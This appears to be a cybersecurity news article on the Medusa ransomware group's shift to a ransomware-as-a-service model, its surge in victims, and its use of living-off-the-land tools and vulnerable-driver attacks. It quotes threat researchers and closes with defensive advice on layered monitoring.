In mid-2024, the Medusa ransomware group made a significant shift in its operations. Moving away from tightly controlled, internal attacks, the group embraced a ransomware-as-a-service (RaaS) model. By opening its platform to affiliates and splitting profits, Medusa quickly expanded its reach. This change mirrored the way franchises scale businesses—bringing in partners while growing more powerful.
Since adopting the RaaS approach, attacks using Medusa’s infrastructure surged by 43% last year. That momentum hasn’t slowed, and 2025 is on track to see an even bigger spike. So far, between 300 and 400 organizations have been compromised, many in high-stakes sectors like healthcare and manufacturing. Where disruptions carry serious consequences.
According to Greg Linares, principal threat intelligence analyst at Huntress, this evolution has helped Medusa move upmarket. What began as a group targeting small firms has grown into a threat to large enterprises. He notes the shift became obvious around August 2024. When the group bounced back from a lull and began ramping up operations aggressively.
This rising wave of attacks hasn’t gone unnoticed. Just last month, agencies including the FBI, CISA, and MS-ISAC issued a joint alert. Warning that Medusa had already impacted hundreds of victims and was gaining ground quickly.
Researchers at Broadcom, who refer to the group internally as “Spearwing,” have also tracked the sharp rise. Their analysts report that Medusa has shown consistent year-over-year growth since 2023. Brigid O Gorman from Broadcom’s Symantec Threat Hunter Team points out that Medusa’s activity doubled in the first two months of 2025 compared to the same period in 2024. This spike may be tied to recent law enforcement takedowns of groups like LockBit and Noberus. Which left a gap in the market for cybercriminals to fill.
Part of what makes Medusa so effective is its use of third-party tools and techniques that minimize the group’s own development costs. Rather than building custom malware. The group relies on so-called “living off the land” tools—software that already exists in the operating system or widely available binaries, known as LOLbins. Linares explains that by using these existing tools. Medusa avoids having to maintain proprietary code while also reducing the chance of detection. This allows affiliates to launch attacks more efficiently and cheaply.
Medusa also brings a few more advanced tactics to the table. According to Elastic’s threat research team, the group has used a revoked code-signing driver from a Chinese vendor. The driver mimics a legitimate signature from CrowdStrike. Enabling attackers to sneak in a vulnerable driver and exploit it to bypass security protections. Known as a bring your own vulnerable driver (BYOVD) attack, this method allows Medusa to undermine endpoint security tools that would otherwise block or detect suspicious activity.
Devon Kerr, director of threat research at Elastic, warns that such techniques require organizations to broaden their cybersecurity visibility. Focusing on just one area—like endpoints or network traffic—is no longer enough. Companies should monitor multiple layers across their infrastructure, from cloud environments to physical devices, to spot and stop these evasive threats.
Kerr also believes the current economic climate is indirectly fueling the rise in RaaS activity. When job markets shrink and financial pressures grow, more individuals may turn to cybercrime. He notes that spikes in criminal behavior often follow periods of economic instability, citing the 2008 housing crash and the COVID-19 pandemic as previous examples. Today’s rise in affiliate-based ransomware seems to follow the same pattern.
With the global economy in flux, Kerr urges businesses to invest in multi-layered visibility across their systems. Relying on a single line of defense won’t cut it, especially when modern threats are designed to disable or bypass security tools. Enterprises need overlapping sensors and technologies to detect early signs of intrusion, and they should assume attackers will actively try to neutralize defenses along the way.
For now, Medusa’s momentum shows no signs of slowing. The group’s evolution into a scalable, efficient criminal operation has turned it into one of the most active and dangerous players in the ransomware landscape. And unless defenders adapt just as quickly, the number of victims will only continue to grow.
